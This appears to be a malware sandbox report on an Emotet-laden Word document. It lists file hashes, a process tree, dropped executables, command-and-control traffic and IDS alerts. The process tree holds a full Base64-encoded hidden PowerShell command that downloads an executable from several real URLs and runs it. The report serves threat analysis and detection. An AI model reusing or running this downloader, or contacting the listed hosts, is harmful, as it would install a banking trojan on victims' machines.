File name: | UNTITLED_632586_T9336838.doc.zip |
Full analysis: | https://app.any.run/tasks/b7720a1e-d3ce-42b8-8114-749de9b4a376 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 19:43:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 1D10DAE8A855CDA457603F0BB59093A5 |
SHA1: | 0C6DB1F069420F061FF5A9E529EB4E93D4243EF8 |
SHA256: | 827AC5109E43FA522A10544D6CC1651E0CCE727391E45CB8FD9A46FB82DCE848 |
SSDEEP: | 1536:QX7CX5ASKpQljNQbpV+79nz7mjZW2SZsEA1WSG3ahDjwJMF3JqEzTGHH/ShB9Zy1:04EiNQbpVozrsEwWSnM2tkQkSjA |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:05:20 19:43:20 |
ZipCRC: | 0xec064e6e |
ZipCompressedSize: | 81243 |
ZipUncompressedSize: | 130432 |
ZipFileName: | UNTITLED_632586_T9336838.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3316 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UNTITLED_632586_T9336838.doc.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3148 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3216 | powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABOAF8ANABfADAANQA3AF8APQAnAHUAMAAyAF8AOQAwACcAOwAkAFUAOQA2ADQAOQAxADcAXwAgAD0AIAAnADcANwAwACcAOwAkAHcAMwA1ADYAXwA3AD0AJwBWADEAMQAyADYAMgA5ACcAOwAkAHMANgA5ADgAMQBfADEAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQA5ADYANAA5ADEANwBfACsAJwAuAGUAeABlACcAOwAkAEwAOQAwADcANAAxADQAXwA9ACcAaAA3ADcAMAAzADEAOAAnADsAJABtADAAMQA0ADkAOQAwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdABgAC4AVwBgAEUAQgBDAGwASQBlAGAATgB0ADsAJABhADMANAAwADMANwA5AD0AJwBoAHQAdABwAHMAOgAvAC8AbwB2AGUAcgBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAGMAcwBzAC8AcwBoAGUAYwBnAGUAcwBpAGEAXwBjAGoAdABmADcAcwA2AC0AMgA1ADgANgA2ADUAOAA3ADIAMAAvAEAAaAB0AHQAcAA6AC8ALwBhAG4AdABvAG4AcgBlAHMAaQBkAGUAbgB0AGkAYQBsAC4AYwBvAG0ALwB3AGsAZAByAGwAawAvAHAAYQBwAGsAYQBhADEANwAvAE4AdQBqAFUASgBlAHQATgB5AC8AQABoAHQAdABwADoALwAvAGcAYQB3AGEAaABlAHIALQBzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQAvAG4AbgBnAGIAMgA0AHkALwB2AFgARwBBAHAAVwBVAHcAZAAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAZQBwAHIAbwBwAGUAcgB0AHkAZABlAGEAbABlAHIAegAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAegBlADcAdgBzAF8AdABnAHQANgBlADMAawAtADUALwBAAGgAdAB0AHAAOgAvAC8AZwB1AGkAbQBhAHIAYQBlAHMAYwBvAG4AcwB0AHIAdQB0AG8AcgBhAHMAagBjAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgBUAGwAVABaAHQAQQBVAEIALwAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAcwA1ADQANAAyAF8AMwA9ACcASAA1ADgANQAzADAANwBfACcAOwBmAG8AcgBlAGEAYwBoACgAJABaADEAOQA5ADEAOQA1AF8AIABpAG4AIAAkAGEAMwA0ADAAMwA3ADkAKQB7AHQAcgB5AHsAJABtADAAMQA0ADkAOQAwAC4ARABvAFcATgBsAG8AYQBkAEYAaQBsAGUAKAAkAFoAMQA5ADkAMQA5ADUAXwAsACAAJABzADYAOQA4ADEAXwAxADIAKQA7ACQAagAzADEANwBfADEAMQAwAD0AJwBxADIAOQA0ADIAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHMANgA5ADgAMQBfADEAMgApAC4AbABlAG4ARwBUAEgAIAAtAGcAZQAgADIAOQAyADIAOAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABzADYAOQA4ADEAXwAxADIAOwAkAGoAOAAyADEANgA5ADcAPQAnAFYAOAAzADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAG4AMAA1ADQAMgAxADUAPQAnAEMAOAA1ADQANAA1ADkANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADMANwA5ADUAMgA9ACcASgAwADcAOQA5ADEAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2640 | "C:\Users\admin\770.exe" | C:\Users\admin\770.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2748 | --1fcd1dee | C:\Users\admin\770.exe | 770.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4024 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 770.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2592 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2720 | "C:\Users\admin\AppData\Local\soundser\27TaWa.exe" | C:\Users\admin\AppData\Local\soundser\27TaWa.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3784 | --54b79703 | C:\Users\admin\AppData\Local\soundser\27TaWa.exe | 27TaWa.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2812 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 27TaWa.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR113E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFXWN0O6X276TJDQWOJW.temp | — | |
MD5:— | SHA256:— | |||
2592 | soundser.exe | C:\Users\admin\AppData\Local\soundser\27TaWa.exe | executable | |
MD5:B1994F37B1CA47638931DD05D2A92727 | SHA256:F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A | |||
3216 | powershell.exe | C:\Users\admin\770.exe | executable | |
MD5:9725D9368E642E74586456BBAD9F37B5 | SHA256:8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9 | |||
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\~$TITLED_632586_T9336838.doc | pgc | |
MD5:633F310DCFF68B75D5595D8813D077EA | SHA256:DC4E790594796BF5E67673F904CB207C64D81E8FD70BFBD9012BEDF4D81EF376 | |||
2748 | 770.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:9725D9368E642E74586456BBAD9F37B5 | SHA256:8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9 | |||
3784 | 27TaWa.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:B1994F37B1CA47638931DD05D2A92727 | SHA256:F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A | |||
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E839C6D.wmf | wmf | |
MD5:D9D7118DA48B5A042BBFD83E427173A5 | SHA256:78F9FCB0F03DE13835236497993D7D91C6E491AD125138D34A88A425DC44D643 | |||
3316 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc | document | |
MD5:016FFFBE5A3CF1E23EF25C5393B821C3 | SHA256:9630E97DD14EE791FFCC2FAF3C333E3D19145F087026542EF5AE5A240D69E1F7 | |||
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43A75F8A.wmf | wmf | |
MD5:4DA40A42C6AF15E0CF721E5CF4061D7C | SHA256:B9F68F39C8725D5792AB11F7FB3AE8530B393EE8C71E9426C1FC9D9DC523277E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
456 | soundser.exe | POST | 200 | 74.207.227.96:443 | http://74.207.227.96:443/enable/schema/ringin/merge/ | US | binary | 148 b | malicious |
2592 | soundser.exe | POST | 200 | 74.207.227.96:443 | http://74.207.227.96:443/entries/ | US | binary | 65.9 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2592 | soundser.exe | 74.207.227.96:443 | — | Linode, LLC | US | malicious |
456 | soundser.exe | 74.207.227.96:443 | — | Linode, LLC | US | malicious |
3216 | powershell.exe | 69.90.66.10:443 | overcreative.com | Peer 1 Network (USA) Inc. | CA | unknown |
Domain | IP | Reputation |
---|---|---|
overcreative.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2592 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2592 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
456 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
456 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |